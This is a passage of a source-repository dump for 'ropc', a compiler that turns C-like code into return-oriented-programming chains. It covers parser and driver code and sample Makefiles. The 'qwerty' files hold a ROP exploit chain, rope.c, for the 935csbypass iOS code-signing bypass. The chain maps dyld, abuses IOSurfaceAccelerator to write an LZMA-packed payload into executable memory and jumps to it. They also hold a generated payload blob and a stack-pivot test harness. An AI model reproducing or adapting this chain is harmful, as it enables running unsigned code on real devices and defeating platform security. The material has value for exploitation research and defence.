ENTER(); 575 | if (IS(T_K_BREAK)) { 576 | if (!post) { 577 | die("'break' not in loop\n"); 578 | } 579 | next_token(); /* skip 'break' */ 580 | the_node->jump = new_name("ops"); 581 | post->labels = new_label(post->labels, the_node->jump); 582 | } else if (IS(T_K_CONTINUE)) { 583 | if (!ante) { 584 | die("'continue' not in loop\n"); 585 | } 586 | next_token(); /* skip 'continue' */ 587 | the_node->jump = new_name("ops"); 588 | ante->labels = new_label(ante->labels, the_node->jump); 589 | } else if (IS(T_K_GOTO)) { 590 | next_token(); /* skip 'goto' */ 591 | if (!IS(T_ID)) { 592 | expect("label"); 593 | } 594 | the_node->jump = xstrdup(token.sym); 595 | next_token(); /* skip label */ 596 | } else { 597 | LEAVE(); 598 | return FALSE; 599 | } 600 | if (!IS(T_SEMICOLON)) { 601 | expect(";"); 602 | } 603 | next_token(); /* skip ';' */ 604 | LEAVE(); 605 | return TRUE; 606 | } 607 | 608 | 609 | static struct node * 610 | R_conditional_exp(struct the_node *the_node, enum cond_t *cond) 611 | { 612 | struct node *n = NULL; 613 | ENTER(); 614 | *cond = COND_NE; 615 | if (IS(T_LOGICNOT)) { 616 | *cond = COND_EQ; 617 | next_token(); /* skip '!' */ 618 | } 619 | if (!IS(T_OPENBRACE)) { 620 | expect("'('"); 621 | } 622 | next_token(); /* skip '(' */ 623 | if (IS(T_INT) && !strcmp(token.sym, "1")) { 624 | next_token(); /* skip 'true' */ 625 | } else if (IS(T_INT) && !strcmp(token.sym, "0")) { 626 | *cond = COND_FLIP(*cond); 627 | next_token(); /* skip 'false' */ 628 | } else { 629 | n = R_assignment_exp(the_node); 630 | } 631 | #ifdef DATA_DEBUG 632 | walk_nodes(n, 0); 633 | #endif 634 | if (!IS(T_CLOSEBRACE)) { 635 | expect("')'"); 636 | } 637 | next_token(); /* skip ')' */ 638 | LEAVE(); 639 | return n; 640 | } 641 | 642 | 643 | static void 644 | R_selection_stat_if(struct the_node *the_node, struct the_node *ante, struct the_node *post) 645 | { 646 | struct the_node *body; 647 | struct node *n; 648 | char *label = NULL; 649 | enum cond_t cond; 650 | ENTER(); 651 | next_token(); /* skip 'if' */ 652 | n = R_conditional_exp(the_node, &cond); 653 | body = create_the_node(); 654 | R_stat(body, ante, post); 655 | if (IS(T_K_ELSE)) { 656 | struct the_node *last; 657 | struct the_node *elze; 658 | struct the_node *skip = create_the_node(); 659 | skip->lineno = -1; /* XXX silence this node */ 660 | skip->jump = new_name("ops"); 661 | append_list(body, skip); 662 | next_token(); /* skip 'else' */ 663 | elze = create_the_node(); 664 | R_stat(elze, ante, post); 665 | if (n || cond == COND_EQ) { 666 | label = new_name("ops"); 667 | elze->labels = new_label(elze->labels, label); 668 | } 669 | last = create_the_node(); 670 | last->labels = new_label(NULL, skip->jump); 671 | append_list(skip, elze); 672 | append_list(elze, last); 673 | } else { 674 | if (!optimize_jmp) { 675 | /* XXX hack alert: if the first instruction is a "goto", don't do the inversion + skip over 676 | * this is to maintain compatibility with old code generation when 'optimize_jmp' is not enabled 677 | */ 678 | struct the_node *next; 679 | for (next = body; next && next->cond == COND_AL && !next->labels && !next->code; next = next->next) { 680 | if (next->jump) { 681 | if (n || cond == COND_NE) { 682 | label = next->jump; 683 | } else { 684 | free(next->jump); 685 | } 686 | next->jump = NULL; 687 | goto okay; 688 | } 689 | } 690 | } 691 | if (n || cond == COND_EQ) { 692 | struct the_node *skip = create_the_node(); 693 | label = new_name("ops"); 694 | skip->labels = new_label(NULL, label); 695 | append_list(body, skip); 696 | } 697 | } 698 | cond = COND_FLIP(cond); 699 | okay: 700 | append_list(the_node, body); 701 | the_node->code = n; 702 | the_node->cond = n ? cond : COND_AL; 703 | the_node->jump = label; 704 | LEAVE(); 705 | } 706 | 707 | 708 | static void 709 | R_selection_stat_do(struct the_node *the_node) 710 | { 711 | struct the_node *body = the_node; 712 | struct the_node *eval; 713 | struct the_node *skip; 714 | struct node *n; 715 | char *label = NULL; 716 | enum cond_t cond; 717 | ENTER(); 718 | next_token(); /* skip 'do' */ 719 | eval = create_the_node(); 720 | skip = create_the_node(); 721 | R_stat(body, eval, skip); 722 | if (!IS(T_K_WHILE)) { 723 | expect("while"); 724 | } 725 | next_token(); /* skip 'while' */ 726 | eval->lineno = token.lineno; /* XXX fix error reporting */ 727 | n = R_conditional_exp(eval, &cond); 728 | if (!IS(T_SEMICOLON)) { 729 | expect(";"); 730 | } 731 | next_token(); /* skip ';' */ 732 | append_list(eval, skip); 733 | append_list(body, eval); 734 | if (n || cond != COND_EQ) { 735 | label = new_name("ops"); 736 | body->labels = new_label(body->labels, label); 737 | } 738 | eval->code = n; 739 | eval->cond = n ? cond : COND_AL; 740 | eval->jump = label; 741 | LEAVE(); 742 | } 743 | 744 | 745 | static void 746 | R_selection_stat_while(struct the_node *the_node) 747 | { 748 | struct the_node *body; 749 | struct the_node *skip; 750 | struct node *n; 751 | char *label = NULL; 752 | enum cond_t cond; 753 | ENTER(); 754 | next_token(); /* skip 'while' */ 755 | n = R_conditional_exp(the_node, &cond); 756 | body = create_the_node(); 757 | skip = create_the_node(); 758 | R_stat(body, the_node, skip); 759 | if (n || cond == COND_NE) { 760 | struct the_node *back = create_the_node(); 761 | back->lineno = -1; /* XXX silence this node */ 762 | back->jump = new_name("ops"); 763 | the_node->labels = new_label(the_node->labels, back->jump); 764 | append_list(body, back); 765 | } 766 | if (n || cond == COND_EQ) { 767 | label = new_name("ops"); 768 | skip->labels = new_label(skip->labels, label); 769 | append_list(body, skip); 770 | } else if (skip->labels) { 771 | append_list(body, skip); 772 | } 773 | cond = COND_FLIP(cond); 774 | append_list(the_node, body); 775 | the_node->code = n; 776 | the_node->cond = n ? cond : COND_AL; 777 | the_node->jump = label; 778 | LEAVE(); 779 | } 780 | 781 | 782 | static BOOL 783 | R_selection_stat(struct the_node *the_node, struct the_node *ante, struct the_node *post) 784 | { 785 | int match = TRUE; 786 | ENTER(); 787 | if (IS(T_K_IF)) { 788 | R_selection_stat_if(the_node, ante, post); 789 | } else if (IS(T_K_DO)) { 790 | R_selection_stat_do(the_node); 791 | } else if (IS(T_K_WHILE)) { 792 | R_selection_stat_while(the_node); 793 | } else { 794 | match = FALSE; 795 | } 796 | LEAVE(); 797 | return match; 798 | } 799 | 800 | 801 | static void 802 | R_external_decl(void) 803 | { 804 | char *import; 805 | int attr, regparm = -1, restack = -1; 806 | unsigned long long val = -1; 807 | ENTER(); 808 | next_token(); /* skip 'extern' */ 809 | if (!IS(T_ID)) { 810 | expect("identifier"); 811 | } 812 | import = xstrdup(token.sym); 813 | next_token(); /* skip ID */ 814 | attr = R_attribute_spec(ATTRIB_NORETURN | ATTRIB_STDCALL | ATTRIB_REGPARM, ®parm, &restack); 815 | if (IS(T_ASSIGN)) { 816 | next_token(); /* skip '=' */ 817 | if (!IS(T_INT)) { 818 | expect("integer"); 819 | } 820 | val = strtoull(token.sym, NULL, 0); 821 | next_token(); /* skip NUMBER */ 822 | } 823 | emit_extern(import, val, attr, regparm); 824 | free(import); 825 | LEAVE(); 826 | } 827 | 828 | 829 | static struct the_node * 830 | R_stat_or_decl_list(enum TOKTYPE terminator, struct the_node *ante, struct the_node *post) 831 | { 832 | struct the_node *new_node; 833 | struct the_node *the_node = NULL; 834 | ENTER(); 835 | while (!IS(terminator)) { 836 | if (IS(T_K_EXTERN)) { 837 | R_external_decl(); 838 | if (!IS(T_SEMICOLON)) { 839 | expect(";"); 840 | } 841 | next_token(); /* skip ';' */ 842 | continue; 843 | } 844 | new_node = create_the_node(); 845 | R_stat(new_node, ante, post); 846 | the_node = append_list(the_node, new_node); 847 | } 848 | LEAVE(); 849 | return the_node; 850 | } 851 | 852 | 853 | static void 854 | R_labeled_stat(struct the_node *the_node) 855 | { 856 | ENTER(); 857 | while (IS(T_ID) && peek_token() == T_COLON) { 858 | the_node->labels = new_label(the_node->labels, token.sym); 859 | next_token(); /* skip ID */ 860 | next_token(); /* skip ':' */ 861 | } 862 | LEAVE(); 863 | } 864 | 865 | 866 | static void 867 | R_stat(struct the_node *the_node, struct the_node *ante, struct the_node *post) 868 | { 869 | struct node *n; 870 | ENTER(); 871 | R_labeled_stat(the_node); 872 | if (IS(T_SEMICOLON)) { 873 | next_token(); /* skip ';' */ 874 | LEAVE(); 875 | return; 876 | } 877 | if (IS(T_OPENCURLY)) { 878 | struct the_node *new_node; 879 | next_token(); /* skip '{' */ 880 | new_node = R_stat_or_decl_list(T_CLOSECURLY, ante, post); 881 | append_list(the_node, new_node); 882 | if (!IS(T_CLOSECURLY)) { 883 | expect("}"); 884 | } 885 | next_token(); /* skip '}' */ 886 | LEAVE(); 887 | return; 888 | } 889 | if (R_jump_stat(the_node, ante, post)) { 890 | LEAVE(); 891 | return; 892 | } 893 | if (R_selection_stat(the_node, ante, post)) { 894 | LEAVE(); 895 | return; 896 | } 897 | n = R_assignment_exp(the_node); 898 | #ifdef DATA_DEBUG 899 | walk_nodes(n, 0); 900 | #endif 901 | the_node->code = n; 902 | if (!IS(T_SEMICOLON)) { 903 | expect(";"); 904 | } 905 | next_token(); /* skip ';' */ 906 | LEAVE(); 907 | } 908 | 909 | 910 | struct the_node * 911 | parse(void) 912 | { 913 | next_token(); /* pre-prime the first token */ 914 | return R_stat_or_decl_list(T_EOI, NULL, NULL); 915 | } 916 | -------------------------------------------------------------------------------- /parser.h: -------------------------------------------------------------------------------- 1 | #ifndef PARSER_H_ 2 | #define PARSER_H_ 3 | 4 | struct the_node *parse(void); 5 | 6 | #endif 7 | -------------------------------------------------------------------------------- /qwerty/payload.asm: -------------------------------------------------------------------------------- 1 | ;%define ROPE_ADDRESS 0x100000 2 | ;%define CACHE_SLIDE 0x200000 3 | 4 | segment .text 5 | org ROPE_ADDRESS 6 | 7 | %macro dg 1 8 | dd %1 + CACHE_SLIDE ; just add the slide at compile-time 9 | %endmacro 10 | ;%define dg dd CACHE_SLIDE + 11 | 12 | %define du dd ; we are org-ed at the right address 13 | 14 | rope: 15 | ; assume we pivot by LDMIA R0, {SP,PC} 16 | du __ropstack + 4 ; -> SP 17 | __ropstack: 18 | %include "rope.asm" 19 | align 8 20 | payload: 21 | %include "payload.inc" 22 | align 8 23 | dyld_header: 24 | times 0x1000 dd 0 25 | -------------------------------------------------------------------------------- /qwerty/payload.inc: -------------------------------------------------------------------------------- 1 | ; generated 2 | db 0xfd, 0x37, 0x7a, 0x58, 0x5a, 0x00, 0x00, 0x00, 0xff, 0x12, 0xd9, 0x41, 0x02, 0xc0, 0x0c, 0x08 3 | db 0x21, 0x01, 0x16, 0x00, 0x9e, 0xdb, 0x7c, 0xa9, 0x01, 0x00, 0x07, 0x2a, 0x00, 0xa0, 0xe3, 0x1e 4 | db 0xff, 0x2f, 0xe1, 0x00, 0x00, 0x01, 0x18, 0x08, 0x40, 0xa5, 0x46, 0xac, 0x06, 0x72, 0x9e, 0x7a 5 | db 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x59, 0x5a 6 | -------------------------------------------------------------------------------- /qwerty/rope.c: -------------------------------------------------------------------------------- 1 | // 935csbypass 32bit ROP implementation 2 | // Yes, the ROP works. No, the POC does not. :P 3 | // 4 | // https://github.com/kpwn/935csbypass by @qwertyoruiop 5 | // 6 | // gcc -E rope.c | ropc -mrestack=$[0x26] -g -O2 -c dyld_shared_cache_armv7s | grep -v "^###" | sed 's|\\n\", 0$|", 10, 0|' > rope.asm 7 | 8 | extern exit [[noreturn]]; 9 | extern __memcpy_chk; 10 | extern fcntl; 11 | extern mlock; 12 | extern mmap; 13 | extern mprotect; 14 | extern munmap; 15 | extern open; 16 | extern pread; 17 | extern printf; 18 | extern syslog; 19 | extern valloc; 20 | 21 | extern CFShow; 22 | extern CFDictionaryCreateMutable; 23 | extern CFDictionarySetValue; 24 | extern CFNumberCreate; 25 | extern CFRelease; 26 | extern __CFConstantStringClassReference; 27 | extern kCFAllocatorDefault; 28 | extern kCFTypeDictionaryKeyCallBacks; 29 | extern kCFTypeDictionaryValueCallBacks; 30 | 31 | extern IOSurfaceAcceleratorCreate; 32 | extern IOSurfaceAcceleratorTransferSurface; 33 | extern IOSurfaceCreate; 34 | extern kIOSurfaceAllocSize; 35 | extern kIOSurfaceBytesPerElement; 36 | extern kIOSurfaceBytesPerRow; 37 | extern kIOSurfaceHeight; 38 | extern kIOSurfacePixelFormat; 39 | extern kIOSurfaceWidth; 40 | 41 | extern lzma_stream_buffer_decode; 42 | 43 | #if 1 44 | #define kCFAllocatorDefault *kCFAllocatorDefault// or just use NULL... 45 | #else 46 | #define kCFAllocatorDefault 0 47 | #endif 48 | 49 | #define kCFNumberSInt32Type 3 50 | #define kCFNumberSInt64Type 4 51 | 52 | #define O_RDONLY 0x0000 /* open for reading only */ 53 | 54 | #define F_ADDFILESIGS 61 /* add signature from same file (used by dyld for shared libs) */ 55 | #define F_ADDFILESIGS_RETURN 97 /* Add signature from same file, return end offset in structure on sucess */ 56 | 57 | #define MH_MAGIC 0xfeedface /* the mach magic number */ 58 | 59 | #define LC_CODE_SIGNATURE 0x1d /* local of code signature */ 60 | 61 | #define PAGE_SIZE 4096 62 | 63 | #define PROT_READ 0x01 /* [MC2] pages can be read */ 64 | #define PROT_WRITE 0x02 /* [MC2] pages can be written */ 65 | #define PROT_EXEC 0x04 /* [MC2] pages can be executed */ 66 | 67 | #define MAP_PRIVATE 0x0002 /* [MF|SHM] changes are private */ 68 | #define MAP_ANON 0x1000 /* allocated from memory, swap space */ 69 | #define MAP_FILE 0x0000 /* map from file (default) */ 70 | 71 | volatile src = valloc(4096); 72 | #if 0 73 | __memcpy_chk(src, &payload, 8, -1); 74 | #else 75 | memlimit = { 0x20000000, 0 }; 76 | inPos = 0; 77 | outPos = 0; 78 | lzma_stream_buffer_decode(memlimit, 0, 0, &payload, &inPos, 56, src, &outPos, 4096); 79 | #endif 80 | 81 | _fd = fd_ = fd = open("/usr/lib/dyld", O_RDONLY); 82 | 83 | // XXX I am pretty sure we'll find the magic eventually, so I skipped some sanity checks to KISS 84 | off = -0x1000; 85 | scan: 86 | off = off + 0x1000; 87 | [[stack]]pread(fd, &dyld_header, 0x4000, off, 0); 88 | hdr = &dyld_header; // XXX can't use *dyld_header here, because it'll think it's a pointer 89 | if (*hdr + -MH_MAGIC) goto scan; // if (*dyld_header != MH_MAGIC) goto scan; 90 | protmap = off; 91 | 92 | // XXX I am pretty sure we'll find the command eventually, so I skipped some sanity checks to KISS 93 | lc = &dyld_header + 28; // sizeof(struct mach_header) 94 | cmds: 95 | if !(*lc + -LC_CODE_SIGNATURE) goto done; // if (lc->cmd == LC_CODE_SIGNATURE) break; 96 | pcmdsize = lc + 4; // offsetof(cmdsize) 97 | lc = lc + *pcmdsize; 98 | goto cmds; 99 | done: 100 | 101 | psiginfo = siginfo = { 0, 0, 0, 0 }; // just to avoid volatile 102 | *siginfo = off; // siginfo.fs_file_start=off 103 | __memcpy_chk(siginfo + 8, lc + 8, 8, -1); // siginfo.fs_blob_start = (void*)codeSigCmd->dataoff; siginfo.fs_blob_size = codeSigCmd->datasize 104 | 105 | result = fcntl(fd_, F_ADDFILESIGS_RETURN, psiginfo); 106 | syslog(3, "Sigload %x\n", result); 107 | 108 | width = 64; // PAGE_SIZE / (16*4) 109 | height = 16; 110 | pitch = 256; // width * 4 111 | size = 4096; // width * height * 4 112 | bPE = 4; 113 | pixelFormat = "ARGB"; 114 | volatile kIOSurfaceAddress = { __CFConstantStringClassReference, 0x7c8, "IOSurfaceAddress", 16 }; 115 | 116 | volatile dict = CFDictionaryCreateMutable(kCFAllocatorDefault, 0, kCFTypeDictionaryKeyCallBacks, kCFTypeDictionaryValueCallBacks); 117 | CFDictionarySetValue(dict, *kIOSurfaceBytesPerRow, CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt32Type, &pitch)); 118 | CFDictionarySetValue(dict, *kIOSurfaceBytesPerElement, CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt32Type, &bPE)); 119 | CFDictionarySetValue(dict, *kIOSurfaceWidth, CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt32Type, &width)); 120 | CFDictionarySetValue(dict, *kIOSurfaceHeight, CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt32Type, &height)); 121 | CFDictionarySetValue(dict, *kIOSurfacePixelFormat, CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt32Type, pixelFormat)); 122 | CFDictionarySetValue(dict, *kIOSurfaceAllocSize, CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt32Type, &size)); 123 | 124 | IOSurfaceAcceleratorCreate(kCFAllocatorDefault, 0, &accel); 125 | 126 | IOSurfaceAcceleratorTransferSurface(0,0,0,0,0,0,0); 127 | mprotect(0,0,0); 128 | mlock(0,0); 129 | mmap(0,0,0,0,0,0); 130 | IOSurfaceCreate(0); 131 | 132 | src64 = { 0, 0 }; 133 | *src64 = src; 134 | CFDictionarySetValue(dict, kIOSurfaceAddress, CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt64Type, src64)); 135 | //CFShow(dict); 136 | srcSurf_ = srcSurf = IOSurfaceCreate(dict); 137 | volatile addr = mmap(0, PAGE_SIZE, PROT_READ + PROT_EXEC, MAP_FILE + MAP_PRIVATE, _fd, protmap); 138 | //printf("addr = %x\n", addr); 139 | mprotect(addr, PAGE_SIZE, PROT_READ + PROT_WRITE); 140 | addr64 = { 0, 0 }; 141 | *addr64 = addr; 142 | CFDictionarySetValue(dict, kIOSurfaceAddress, CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt64Type, addr64)); 143 | //CFShow(dict); 144 | destSurf_ = destSurf = IOSurfaceCreate(dict); 145 | mprotect(addr, PAGE_SIZE, PROT_READ + PROT_EXEC); 146 | mlock(addr, PAGE_SIZE); 147 | 148 | if (IOSurfaceAcceleratorTransferSurface(accel, srcSurf, destSurf, 0, 0, 0, 0)) goto die; 149 | 150 | CFRelease(destSurf_); 151 | CFRelease(srcSurf_); 152 | 153 | exit(addr()); 154 | 155 | die: 156 | syslog(3, "fail\n"); 157 | exit(-1); 158 | -------------------------------------------------------------------------------- /qwerty/test.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | typedef void __attribute__((noreturn)) (*pivot_t)(void *); 11 | 12 | static pivot_t 13 | get_pivot(void) 14 | { 15 | extern char some_symbol_in_cache[]; 16 | return (pivot_t)(((uintptr_t)some_symbol_in_cache & ~1) + some_offset_to_hit_ldmia); // assume we pivot by LDMIA R0, {SP,PC} 17 | } 18 | 19 | #define ROPSTACK_SIZE (1024 * 1024) 20 | #define RESERVE_SPACE 0x10000 21 | 22 | static unsigned char * 23 | read_file(const char *filename, off_t off, size_t *size) 24 | { 25 | int fd; 26 | size_t rv, sz; 27 | struct stat st; 28 | unsigned char *buf; 29 | 30 | fd = open(filename, O_RDONLY); 31 | if (fd < 0) { 32 | return NULL; 33 | } 34 | 35 | rv = fstat(fd, &st); 36 | if (rv) { 37 | close(fd); 38 | return NULL; 39 | } 40 | 41 | if (off > st.st_size) { 42 | off = st.st_size; 43 | } 44 | sz = st.st_size - off; 45 | 46 | buf = malloc(sz); 47 | if (buf == NULL) { 48 | close(fd); 49 | return NULL; 50 | } 51 | 52 | rv = read(fd, buf, sz); 53 | close(fd); 54 | 55 | if (rv != sz) { 56 | free(buf); 57 | return NULL; 58 | } 59 | 60 | if (size != NULL) { 61 | *size = sz; 62 | } 63 | return buf; 64 | } 65 | 66 | int 67 | main(void) 68 | { 69 | int rv; 70 | size_t sz; 71 | unsigned char *buf, *stack; 72 | pivot_t pivot = get_pivot(); 73 | intptr_t slide = _dyld_get_image_vmaddr_slide(1); 74 | char cmd[BUFSIZ]; 75 | 76 | printf("slide: 0x%zx\n", slide); 77 | printf("pivot: %p\n", (void *)pivot); 78 | 79 | stack = valloc(ROPSTACK_SIZE); 80 | printf("stack: %p\n", (void *)stack); 81 | assert(stack); 82 | 83 | stack += RESERVE_SPACE; 84 | 85 | snprintf(cmd, sizeof(cmd), "nasm -o rope.bin -O6 -fbin -DCACHE_SLIDE=0x%zx -DROPE_ADDRESS=%p payload.asm", slide, (void *)stack); 86 | rv = system(cmd); 87 | assert(rv == 0); 88 | 89 | buf = read_file("rope.bin", 0, &sz); 90 | assert(buf && sz + RESERVE_SPACE < ROPSTACK_SIZE); 91 | memcpy(stack, buf, sz); 92 | 93 | pivot(stack); 94 | return 0; 95 | } 96 | -------------------------------------------------------------------------------- /ropc.c: -------------------------------------------------------------------------------- 1 | /* 2 | * ROP Compiler 3 | * 4 | * Copyright (c) 2012 xerub 5 | * 6 | * This program is free software; you can redistribute it and/or modify 7 | * it under the terms of the GNU General Public License as published by 8 | * the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU General Public License 17 | * along with this program. If not, see . 18 | */ 19 | 20 | 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include "config.h" 29 | #include "util.h" 30 | #include "lexer.h" 31 | #include "parser.h" 32 | #include "code.h" 33 | #include "symtab.h" 34 | #include "backend.h" 35 | 36 | 37 | int test_gadgets = 0; 38 | int optimize_imm = 0; 39 | int optimize_add = 0; 40 | int optimize_reg = 0; 41 | int optimize_jmp = 0; 42 | int show_reg_set = 0; 43 | int nasm_esc_str = 0; 44 | int enable_cfstr = 0; 45 | int no_undefined = 0; 46 | int all_volatile = 0; 47 | int new_name_off = 0; 48 | int inloop_stack = 256; 49 | extern unsigned long gadget_limit; 50 | 51 | static const char *outfile = NULL; 52 | static const char *binary = NULL; 53 | const unsigned char *binmap = NULL; 54 | size_t binsz = 0; 55 | 56 | 57 | static int 58 | check_args(int argc, char **argv) 59 | { 60 | int i; 61 | const char *p; 62 | for (i = 1; i < argc && *(p = argv[i]) == '-'; i++) { 63 | const char *q = p + 2; 64 | if (!strcmp(p, "-h")) { 65 | printf("usage: %s [-O2] [-O{i|a|r|j}] [-mrestack=S] [-g] [-n] [a] [-c cache [-l limit]] [-t] [-o output] file\n" 66 | " -mrestack number of words to reserve on the stack prior to calls\n" 67 | " -Oi optimize immediate assignment\n" 68 | " -Oa optimize simple arithmetic\n" 69 | " -Or optimize register usage\n" 70 | " -Oj optimize jumps\n" 71 | " -O2 all of the above\n" 72 | " -o write output to file\n" 73 | " -c file to link against: gadgets, imports\n" 74 | " -l limit the size of the file for gadgets\n" 75 | " -t test gadgets (used with -c)\n" 76 | " -g print detailed register usage\n" 77 | " -n emit NASM escaped strings: `hello\\n`\n" 78 | " -a accept Apple NSString-like constructs: @\"Hello\"\n" 79 | " -fvolatile force all unqualified vars to be volatile\n" 80 | " -mgenstart start internal name numbering\n" 81 | " -u emit undefined symbols\n" 82 | " -V print version and exit\n" 83 | , argv[0]); 84 | exit(0); 85 | } 86 | if (!strcmp(p, "-V")) { 87 | printf("ropc %s v" ROPC_VERSION "\n", backend_name()); 88 | exit(0); 89 | } 90 | switch (p[1]) { 91 | case 'O': 92 | if (*q == '2') { 93 | optimize_imm = 1; 94 | optimize_add = 1; 95 | optimize_reg = 1; 96 | optimize_jmp = 1; 97 | q++; 98 | break; 99 | } 100 | do { 101 | switch (*q) { 102 | case 'i': optimize_imm = 1; continue; 103 | case 'a': optimize_add = 1; continue; 104 | case 'r': optimize_reg = 1; continue; 105 | case 'j': optimize_jmp = 1; continue; 106 | } 107 | errx(1, "unrecognized option '%s'", p); 108 | } while (*++q); 109 | break; 110 | case 'g': 111 | show_reg_set = 1; 112 | break; 113 | case 'n': 114 | nasm_esc_str = 1; 115 | break; 116 | case 'a': 117 | enable_cfstr = 1; 118 | break; 119 | case 'u': 120 | no_undefined = 1; 121 | break; 122 | case 't': 123 | test_gadgets++; 124 | break; 125 | case 'c': 126 | if (++i >= argc) { 127 | errx(1, "argument to '%s' is missing", p); 128 | } 129 | binary = argv[i]; 130 | break; 131 | case 'l': 132 | if (++i >= argc) { 133 | errx(1, "argument to '%s' is missing", p); 134 | } 135 | gadget_limit = strtoul(argv[i], (char **)&q, 0); 136 | break; 137 | case 'o': 138 | if (++i >= argc) { 139 | errx(1, "argument to '%s' is missing", p); 140 | } 141 | outfile = argv[i]; 142 | break; 143 | case 'f': 144 | if (!strcmp(q, "volatile")) { 145 | all_volatile = 1; 146 | q += 8; 147 | break; 148 | } 149 | q = p; 150 | break; 151 | case 'm': 152 | if (!strncmp(q, "restack=", 8)) { 153 | inloop_stack = strtoul(q + 8, (char **)&q, 0); 154 | break; 155 | } 156 | if (!strncmp(q, "genstart=", 9)) { 157 | new_name_off = strtoul(q + 9, (char **)&q, 10); 158 | break; 159 | } 160 | default: 161 | q = p; 162 | } 163 | if (*q) { 164 | errx(1, "unrecognized option '%s'", p); 165 | } 166 | } 167 | return i; 168 | } 169 | 170 | 171 | int 172 | main(int argc, char **argv) 173 | { 174 | FILE *f; 175 | const char *filename = NULL; 176 | struct the_node *list = NULL; 177 | 178 | int i = check_args(argc, argv); 179 | 180 | if (binary) { 181 | int fd = -1; 182 | long sz = 0; 183 | fd = open(binary, O_RDONLY); 184 | if (fd < 0) { 185 | err(1, "%s", filename); 186 | } 187 | 188 | sz = lseek(fd, 0, SEEK_END); 189 | 190 | binmap = mmap(NULL, sz, PROT_READ, MAP_SHARED, fd, 0); 191 | if (binmap == MAP_FAILED) { 192 | err(1, "%s", filename); 193 | } 194 | binsz = sz; 195 | close(fd); 196 | 197 | if (test_gadgets > 0) { 198 | int rv = backend_test_gadgets(test_gadgets - 1); 199 | munmap((char *)binmap, binsz); 200 | return rv; 201 | } 202 | } 203 | 204 | if (argc > i) { 205 | filename = argv[i]; 206 | token.filename = strdup(filename); 207 | f = fopen(filename, "rt"); 208 | if (!f) { 209 | err(1, "%s", filename); 210 | } 211 | } else { 212 | token.filename = strdup(""); 213 | f = stdin; 214 | } 215 | init_tokens(f); 216 | 217 | new_printer(outfile); 218 | 219 | list = parse(); 220 | emit_code(list); 221 | emit_symbols(); 222 | free_symbols(); 223 | free_tokens(TRUE); 224 | 225 | new_printer(NULL); 226 | 227 | if (filename) { 228 | fclose(f); 229 | } 230 | 231 | munmap((char *)binmap, binsz); 232 | return 0; 233 | } 234 | -------------------------------------------------------------------------------- /sample/Makefile: -------------------------------------------------------------------------------- 1 | all: rop-x86 rop-x86_64 rop-arm rop-arm64 2 | 3 | 4 | rop-x86: wrap-x86.asm rop-x86.asm 5 | nasm -o $@ -O6 $< 6 | 7 | rop-x86.asm: rop-x86.i 8 | ./ropc-x86 -o $@ -O2 -g -n -c dyld_shared_cache_i386 $< 9 | 10 | rop-x86.i: rope.c 11 | gcc -o $@ -DBITS=32 -E $< 12 | 13 | 14 | rop-x86_64: wrap-x86_64.asm rop-x86_64.asm 15 | nasm -o $@ -O6 $< 16 | 17 | rop-x86_64.asm: rop-x86_64.i 18 | ./ropc-x86_64 -o $@ -O2 -g -n -c dyld_shared_cache_x86_64 $< 19 | 20 | rop-x86_64.i: rope.c 21 | gcc -o $@ -DBITS=64 -E $< 22 | 23 | 24 | rop-arm: wrap-arm.asm rop-arm.asm 25 | nasm -o $@ -O6 $< 26 | 27 | rop-arm.asm: rop-arm.i 28 | ./ropc-arm -o $@ -O2 -g -n -c dyld_shared_cache_armv7 $< 29 | 30 | rop-arm.i: rope.c 31 | gcc -o $@ -DBITS=32 -E $< 32 | 33 | 34 | rop-arm64: wrap-arm64.asm rop-arm64.asm 35 | nasm -o $@ -O6 $< 36 | 37 | rop-arm64.asm: rop-arm64.i 38 | ./ropc-arm64 -o $@ -O2 -g -n -c dyld_shared_cache_arm64 $< 39 | 40 | rop-arm64.i: rope.c 41 | gcc -o $@ -DBITS=64 -DARM64 -E $< 42 | 43 | 44 | clean: 45 | -$(RM) rop-x86.asm rop-x86_64.asm rop-arm.asm rop-arm64.asm 46 | -$(RM) rop-x86.i rop-x86_64.i rop-arm.i rop-arm64.i 47 | 48 | distclean: clean 49 | -$(RM) rop-x86 rop-x86_64 rop-arm rop-arm64 50 | -------------------------------------------------------------------------------- /sample/Makefile.dry: -------------------------------------------------------------------------------- 1 | all: rop-x86.asm rop-x86_64.asm rop-arm.asm rop-arm64.asm 2 | 3 | 4 | rop-x86.asm: rop-x86.i 5 | ./ropc-x86 -o $@ -O2 -g -n $< 6 | 7 | rop-x86.i: rope.c 8 | gcc -o $@ -DBITS=32 -E $< 9 | 10 | 11 | rop-x86_64.asm: rop-x86_64.i 12 | ./ropc-x86_64 -o $@ -O2 -g -n $< 13 | 14 | rop-x86_64.i: rope.c 15 | gcc -o $@ -DBITS=64 -E $< 16 | 17 | 18 | rop-arm.asm: rop-arm.i 19 | ./ropc-arm -o $@ -O2 -g -n $< 20 | 21 | rop-arm.i: rope.c 22 | gcc -o $@ -DBITS=32 -E $< 23 | 24 | 25 | rop-arm64.asm: rop-arm64.i 26 | ./ropc-arm64 -o $@ -O2 -g -n $< 27 | 28 | rop-arm64.i: rope.c 29 | gcc -o $@ -DBITS=64 -DARM64 -E $< 30 | 31 | 32 | clean: 33 | -$(RM) rop-x86.asm rop-x86_64.asm rop-arm.asm rop-arm64.asm 34 | -$(RM) rop-x86.i rop-x86_64.i rop-arm.i rop-arm64.i 35 | 36 | distclean: clean 37 | -------------------------------------------------------------------------------- /sample/Makefile.linux: -------------------------------------------------------------------------------- 1 | CFLAGS = -Wall -W -pedantic -O2 -fpie -pie 2 | LDFLAGS = -z,now 3 | LDLIBS = -ldl 4 | 5 | all: 